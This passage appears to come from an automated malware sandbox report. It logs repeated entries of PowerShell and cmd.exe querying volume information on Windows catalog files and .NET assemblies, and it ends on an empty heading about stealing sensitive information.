    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Stealing of Sensitive Information

